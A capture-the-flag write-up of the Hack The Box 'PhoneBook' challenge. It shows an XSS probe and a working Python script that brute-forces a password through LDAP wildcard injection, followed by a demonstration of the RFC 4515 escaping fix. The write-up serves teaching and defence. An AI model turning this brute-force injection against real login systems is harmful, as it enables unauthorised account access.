PhoneBook [web challenge — Hack The Box]

shiv shankar yadav
2 min read · Apr 28, 2022

CHALLENGE DESCRIPTION

Who is lucky enough to be included in the phonebook?

Host : 68.183.45.211:30930

Today I completed a web challenge on Hack The Box. The login credential is brute-forced via LDAP injection. So let's start.

Scanning :

When I browsed to the IP address, I found a website with a login page. I tried standard login credentials, but they failed and the page displayed the warning "Authentication Failed." I saw that "reese" is a user, so I tried different passwords with "reese" as the username, but I was still unable to log in.

After that, I tested XSS on the URL "login?message=<script>alert(1);</script>". It had no effect. When I tried a different payload, an XSS pop-up appeared; however, despite numerous attempts, I could not turn it into anything useful. So I looked into other options for getting around the login.

With the username "Reese" and an "alphanumeric character*" pattern (the LDAP wildcard) in the password field, I was able to get into the application and was redirected to another page.

Exploit :

I wrote a Python script to brute-force the password credential one character at a time, using the wildcard to test each candidate prefix.

import requests
import string

headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0"}
url = "http://68.183.45.211:30930/login"

# candidate characters for the next position of the flag
chars = string.ascii_letters
chars += "".join(["0", "1", "2", "3", "4", "5", "6", "7", "8", "9", "`", "~", "!", "@", "$", "%", "&", "-", "_", "'"])

counter = 0
flag = "HTB{"

while True:
    # if no candidate char matched, the previous round already completed the flag
    if counter == len(chars):
        print(flag + "}")
        break

    # creates something like HTB{a*}: the LDAP wildcard matches any remaining characters
    password = flag + chars[counter] + "*}"
    print("Trying: " + password)

    data = {"username": "Reese", "password": password}
    response = requests.post(url, headers=headers, data=data)

    if response.url != url + "?message=Authentication%20failed":
        # possible flag since we still use * at the end, e.g. HTB{abc_*}
        # append chars[counter] so we don't need to strip "*}" from password
        flag += chars[counter]
        counter = 0
    else:
        # this character did not match, try the next one
        counter += 1

It takes some time to brute force, but it finds the flag.
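To show why the wildcard works and what closes the hole, here is an added example (not part of the original write-up or the challenge's code): it models the back-end filter `(&(uid=...)(userPassword=...))` against a constructed directory entry with a placeholder secret, once built straight from user input and once with RFC 4515 escaping.

```python
import re

# Constructed directory entry standing in for the challenge's LDAP backend.
DIRECTORY = [{"uid": "Reese", "userPassword": "HTB{constructed_secret}"}]


def ldap_escape(value: str) -> str:
    """Escape filter metacharacters as RFC 4515 requires (\\ * ( ) and NUL)."""
    return "".join("\\%02x" % ord(c) if c in "\\*()\0" else c for c in value)


def assertion_matches(pattern: str, stored: str) -> bool:
    """Evaluate one filter assertion the way an LDAP server would:
    '*' is a substring wildcard, '\\XX' is a literal escaped byte.
    (Simplified: real servers often compare uid case-insensitively.)"""
    regex, i = "", 0
    while i < len(pattern):
        if pattern[i] == "*":
            regex += ".*"
        elif pattern[i] == "\\" and i + 2 < len(pattern):
            regex += re.escape(chr(int(pattern[i + 1:i + 3], 16)))
            i += 2
        else:
            regex += re.escape(pattern[i])
        i += 1
    return re.fullmatch(regex, stored) is not None


def authenticate(username: str, password: str, escape: bool) -> tuple:
    """Build the (&(uid=..)(userPassword=..)) filter from user input and run it.
    escape=False is the vulnerable pattern; escape=True is the fix.
    Returns (login succeeded, filter string that would be sent)."""
    u = ldap_escape(username) if escape else username
    p = ldap_escape(password) if escape else password
    filt = f"(&(uid={u})(userPassword={p}))"
    ok = any(assertion_matches(u, e["uid"]) and assertion_matches(p, e["userPassword"])
             for e in DIRECTORY)
    return ok, filt


if __name__ == "__main__":
    # "*" and "HTB{c*" log in only when the input is not escaped;
    # the real secret still logs in with escaping on.
    for pw in ["*", "HTB{c*", "HTB{x*", "HTB{constructed_secret}"]:
        for esc in (False, True):
            ok, filt = authenticate("Reese", pw, esc)
            print(f"escape={esc!s:5} {filt:45} -> {'login' if ok else 'denied'}")
```

With escaping, a prefix probe like `HTB{c*` becomes the literal `HTB{c\2a`, so the one-character-at-a-time oracle disappears while genuine logins keep working.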

Thank You



I am a certified ethical hacker (CEH) and a certified red team professional (CRTP) with a strong background in active directory and web penetration testing.